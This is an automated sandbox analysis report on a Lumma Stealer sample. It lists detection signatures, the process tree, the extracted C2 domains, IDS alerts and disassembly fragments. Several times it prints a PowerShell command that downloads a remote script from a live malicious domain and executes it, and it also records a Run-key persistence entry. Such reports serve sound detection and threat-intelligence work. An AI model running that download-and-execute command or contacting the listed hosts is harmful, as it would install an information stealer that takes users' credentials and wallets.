
Windows Analysis Report

Overview

General Information

Analysis ID:1519581

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6784 cmdline: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7052 cmdline: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • PrivacyDrive.exe (PID: 2504 cmdline: "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe" MD5: 80C2A36E9A14E3EDBA0B706D2433D9B8)
        • WerFault.exe (PID: 3384 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 2212 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 6012 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1696 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 7100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1716 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • PrivacyDrive.exe (PID: 764 cmdline: "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe" MD5: 80C2A36E9A14E3EDBA0B706D2433D9B8)
    • WerFault.exe (PID: 6316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 1728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["abortinoiwiam.shop", "deallyharvenw.shop", "defenddsouneuw.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "surroundeocw.shop", "priooozekw.shop", "candleduseiwo.shop", "racedsuitreow.shop"], "Build id": "yJEcaG--rui1222"}
Source | Rule | Description | Author | Strings
00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x5ad2f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x5ad2f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

    System Summary

    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6024, ProcessCommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", ProcessId: 6784, ProcessName: cmd.exe
    Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RATU0Beb
    Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetFilename: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6024, ProcessCommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", ProcessId: 6784, ProcessName: cmd.exe
    Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6024, ProcessCommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", ProcessId: 6784, ProcessName: cmd.exe
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, CommandLine: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6784, ParentProcessName: cmd.exe, ProcessCommandLine: "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text, ProcessId: 7052, ProcessName: powershell.exe
    Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 732, ProcessName: svchost.exe
    Timestamp                        SID      Severity  Classtype                             Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-09-26T17:46:48.562552+0200  2054653  1         A Network Trojan was detected         192.168.2.4  49744        172.67.206.221  443               TCP
    2024-09-26T17:46:49.598721+0200  2054653  1         A Network Trojan was detected         192.168.2.4  49745        172.67.206.221  443               TCP
    2024-09-26T17:46:59.100244+0200  2054653  1         A Network Trojan was detected         192.168.2.4  49748        172.67.206.221  443               TCP
    2024-09-26T17:47:00.280736+0200  2054653  1         A Network Trojan was detected         192.168.2.4  49749        172.67.206.221  443               TCP

    Timestamp                        SID      Severity  Classtype                             Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-09-26T17:46:48.562552+0200  2049836  1         A Network Trojan was detected         192.168.2.4  49744        172.67.206.221  443               TCP
    2024-09-26T17:46:59.100244+0200  2049836  1         A Network Trojan was detected         192.168.2.4  49748        172.67.206.221  443               TCP

    Timestamp                        SID      Severity  Classtype                             Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-09-26T17:46:49.598721+0200  2049812  1         A Network Trojan was detected         192.168.2.4  49745        172.67.206.221  443               TCP
    2024-09-26T17:47:00.280736+0200  2049812  1         A Network Trojan was detected         192.168.2.4  49749        172.67.206.221  443               TCP

    Timestamp                        SID      Severity  Classtype                             Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-09-26T17:46:48.357475+0200  2056079  1         Domain Observed Used for C2 Detected  192.168.2.4  49744        172.67.206.221  443               TCP
    2024-09-26T17:46:49.125919+0200  2056079  1         Domain Observed Used for C2 Detected  192.168.2.4  49745        172.67.206.221  443               TCP
    2024-09-26T17:46:58.843588+0200  2056079  1         Domain Observed Used for C2 Detected  192.168.2.4  49748        172.67.206.221  443               TCP
    2024-09-26T17:46:59.804866+0200  2056079  1         Domain Observed Used for C2 Detected  192.168.2.4  49749        172.67.206.221  443               TCP

    Timestamp                        SID      Severity  Classtype                             Source IP    Source Port  Destination IP  Destination Port  Protocol
    2024-09-26T17:46:47.842585+0200  2056078  1         Domain Observed Used for C2 Detected  192.168.2.4  50546        1.1.1.1         53                UDP


    AV Detection

    Source: https://racedsuitreow.shop/P | Avira URL Cloud: Label: malware
    Source: https://finalstepgo.com/ | Avira URL Cloud: Label: malware
    Source: covvercilverow.shop | Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apiJV& | Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apiU.h | Avira URL Cloud: Label: malware
    Source: https://finalstepgo.com/uploads/il222.zip | Avira URL Cloud: Label: malware
    Source: pumpkinkwquo.shop | Avira URL Cloud: Label: malware
    Source: abortinoiwiam.shop | Avira URL Cloud: Label: malware
    Source: deallyharvenw.shop | Avira URL Cloud: Label: malware
    Source: https://finalstepgo.com/uploads/il222.zipK | Avira URL Cloud: Label: malware
    Source: https://finalstepgo.com:443/uploads/il222.zip | Avira URL Cloud: Label: malware
    Source: defenddsouneuw.shop | Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apiV | Avira URL Cloud: Label: malware
    Source: priooozekw.shop | Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/ | Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/)e3 | Avira URL Cloud: Label: malware
    Source: https://finalstepgo.com/a | Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apisP | Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/api | Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/3 | Avira URL Cloud: Label: malware
    Source: surroundeocw.shop | Avira URL Cloud: Label: malware
    Source: racedsuitreow.shop | Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop:443/api | Avira URL Cloud: Label: malware
    Source: candleduseiwo.shop | Avira URL Cloud: Label: malware
    Source: https://racedsuitreow.shop/apie | Avira URL Cloud: Label: malware
    Source: https://finalstepgo.com/uploads/il2.txt | Avira URL Cloud: Label: malware
    Source: https://finalstepgo.com:443/uploads/il222.zipe | Avira URL Cloud: Label: malware
    Source: PrivacyDrive.exe.764.8.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["abortinoiwiam.shop", "deallyharvenw.shop", "defenddsouneuw.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "surroundeocw.shop", "priooozekw.shop", "candleduseiwo.shop", "racedsuitreow.shop"], "Build id": "yJEcaG--rui1222"}
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: covvercilverow.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: surroundeocw.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: abortinoiwiam.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: pumpkinkwquo.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: priooozekw.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: deallyharvenw.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: defenddsouneuw.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: racedsuitreow.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: candleduseiwo.shop
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
    Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp | String decryptor: yJEcaG--rui1222
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_0052D130 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, | 4_2_0052D130
    Source: unknown | HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49744 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49745 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49748 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.4:49749 version: TLS 1.2
    Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
    Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00477BE0 FindFirstFileW, | 4_2_00477BE0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4_2_00495D80 FindFirstFileW,FindClose, | 4_2_00495D80
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 4_2_00F96013
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 4_2_00F9600C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then movzx edx, byte ptr [ecx+eax] | 4_2_00F911B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-18h] | 4_2_00FAD0CE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-54h] | 4_2_00FA2132
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-18h] | 4_2_00FAD134
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 4_2_00FC12FC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h | 4_2_00FC12FC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 4_2_00FCC2B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [ebx], al | 4_2_00FB429B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [ebx], al | 4_2_00FB429B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 4_2_00FBC282
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh | 4_2_00FC5272
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [ebx], al | 4_2_00FB4215
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [ebx], al | 4_2_00FB4215
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh | 4_2_00FC63F2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 4_2_00F9539E
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h | 4_2_00FA8312
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp byte ptr [edi], 00000000h | 4_2_00F974E1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp+10h] | 4_2_00F8F4B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, 0000000Bh | 4_2_00FB54B5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then movzx ebp, word ptr [edi] | 4_2_00FC0432
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-54h] | 4_2_00FA2403
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esi+00000744h] | 4_2_00FB45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [edi], al | 4_2_00FB45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [ebx], al | 4_2_00FB45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-54h] | 4_2_00FA25AE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov word ptr [eax], cx | 4_2_00FA8582
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 4_2_00FAF577
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h | 4_2_00F9F6C4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then movzx edx, byte ptr [esi+edi] | 4_2_00F866B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 4_2_00FAA692
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh | 4_2_00FAD652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh | 4_2_00FAD652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov word ptr [eax], cx | 4_2_00FCB612
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-14h] | 4_2_00FB076F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-14h] | 4_2_00FB076F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then movzx edx, byte ptr [esi+ebx] | 4_2_00F87712
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov edi, ecx | 4_2_00F958A8
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then push ebx | 4_2_00F9F835
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 4_2_00FC9832
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh | 4_2_00FC9832
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 4_2_00F959AB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp+28h] | 4_2_00F959AB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov dword ptr [esp], 00000000h | 4_2_00F9C952
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 4_2_00F92911
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp byte ptr [edi], 00000000h | 4_2_00F97AF3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then jmp eax | 4_2_00F97BF4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h | 4_2_00FCBBE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h | 4_2_00FA0B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov word ptr [esi], ax | 4_2_00FA0B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov edi, eax | 4_2_00F88B72
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then jmp ecx | 4_2_00FC0B62
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [edi], al | 4_2_00FB4B4C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then movzx eax, word ptr [esi+ecx] | 4_2_00FC2B02
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp+08h] | 4_2_00F94DDD
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 4_2_00FB1DB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 4_2_00FA9DA7
